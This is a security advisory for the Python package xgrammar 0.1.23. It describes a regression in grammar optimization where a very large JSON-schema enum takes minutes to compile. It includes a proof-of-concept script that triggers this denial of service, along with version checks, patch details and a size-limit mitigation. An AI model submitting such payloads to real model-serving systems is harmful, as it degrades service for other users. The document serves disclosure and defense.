Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| xgrammar | pip | = 0.1.23 | 0.1.24 |
Installations running xgrammar 0.1.23 are affected.
Recommended Action
Patch available
Update xgrammar to version 0.1.24
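To confirm whether an environment falls in the vulnerable range from the table above, a minimal sketch along these lines may help. The helper names `is_vulnerable` and `installed_xgrammar_version` are hypothetical and not part of xgrammar. The check relies only on the standard-library `importlib.metadata` module and assumes the package is installed under the distribution name `xgrammar`.

```python
from importlib import metadata
from typing import Optional

# Per the advisory table, only this exact release is listed as vulnerable.
VULNERABLE_VERSIONS = {"0.1.23"}


def is_vulnerable(version: str) -> bool:
    """Return True if the given version string is listed as vulnerable."""
    return version.strip() in VULNERABLE_VERSIONS


def installed_xgrammar_version() -> Optional[str]:
    """Return the installed xgrammar version, or None if it is not installed."""
    try:
        return metadata.version("xgrammar")
    except metadata.PackageNotFoundError:
        return None


if __name__ == "__main__":
    version = installed_xgrammar_version()
    if version is None:
        print("xgrammar is not installed")
    elif is_vulnerable(version):
        print(f"xgrammar {version} is affected; update to 0.1.24")
    else:
        print(f"xgrammar {version} is not listed as affected")
```

If the check reports an affected version, upgrading with `pip install --upgrade "xgrammar>=0.1.24"` moves the environment to the patched release.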
Technical Details
NVD Description
### Summary

The provided grammar would fit in the context window of most models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine, so this seems to be a regression caused by the Earley parser.

### Details

A full reproducer is provided in the PoC section. The resulting grammar is around 70k tokens, and parsing the grammar took significantly longer than the LLM processing itself (with the models I checked), meaning this can be used to DoS model providers.

### Patch

This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the one below. v0.1.24 solved this problem by speeding up the grammar optimizer and disabling some slow optimizations for large grammars. Thanks to @Seven-Streams.

### PoC

```
import string
import random


def enum_schema(size=10000, str_len=10):
    # Build one large enum of random uppercase strings.
    enum = {
        "enum": [
            "".join(random.choices(string.ascii_uppercase, k=str_len))
            for _ in range(size)
        ]
    }
    # Reference the same enum from eight properties.
    schema = {
        "definitions": {"colorEnum": enum},
        "type": "object",
        "properties": {
            "color1": {"$ref": "#/definitions/colorEnum"},
            "color2": {"$ref": "#/definitions/colorEnum"},
            "color3": {"$ref": "#/definitions/colorEnum"},
            "color4": {"$ref": "#/definitions/colorEnum"},
            "color5": {"$ref": "#/definitions/colorEnum"},
            "color6": {"$ref": "#/definitions/colorEnum"},
            "color7": {"$ref": "#/definitions/colorEnum"},
            "color8": {"$ref": "#/definitions/colorEnum"},
        },
        "required": ["color1", "color2"],
    }
    return schema


schema_enum = enum_schema()
print(schema_enum)
print(test_schema(schema_enum, {}))
```

where `test_schema` must be defined before the calls above run:

```
import json

import xgrammar as xgr
# Assumption: the advisory does not show its imports; this helper is taken
# to come from xgrammar's testing module.
from xgrammar.testing import _is_grammar_accept_string


def test_schema(schema, instance):
    grammar = xgr.Grammar.from_json_schema(
        json.dumps(schema),
        strict_mode=True,
    )
    return _is_grammar_accept_string(grammar, json.dumps(instance))
```

### Impact

Denial of service (DoS).
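Because the slowdown is triggered by very large grammars built from client-supplied schemas, a service that cannot upgrade immediately might reject oversized schemas before they reach the grammar compiler. The following is a minimal sketch of that idea, not a fix from the xgrammar project. `check_schema_size`, `SchemaTooLargeError`, and `MAX_SCHEMA_CHARS` are hypothetical names, and the limit is a placeholder: the advisory's ">100k characters" figure describes the generated grammar, not the JSON schema text measured here.

```python
import json

# Hypothetical limit, loosely based on the advisory's ">100k characters"
# figure. That figure refers to the generated grammar rather than the JSON
# schema, so treat this value as a starting point to tune per deployment.
MAX_SCHEMA_CHARS = 100_000


class SchemaTooLargeError(ValueError):
    """Raised when a client-supplied schema exceeds the configured limit."""


def check_schema_size(schema: dict, max_chars: int = MAX_SCHEMA_CHARS) -> str:
    """Serialize the schema and reject it if the JSON text is too long.

    Returns the serialized schema so the caller can pass it on to the
    grammar compiler without serializing it a second time.
    """
    serialized = json.dumps(schema)
    if len(serialized) > max_chars:
        raise SchemaTooLargeError(
            f"schema is {len(serialized)} characters, limit is {max_chars}"
        )
    return serialized
```

With the PoC's defaults (10,000 enum values of 10 characters each), the serialized schema is well over 100,000 characters and would be rejected by this check, while ordinary small schemas pass through unchanged. A size cap of this kind only reduces exposure; updating to 0.1.24 remains the recommended action.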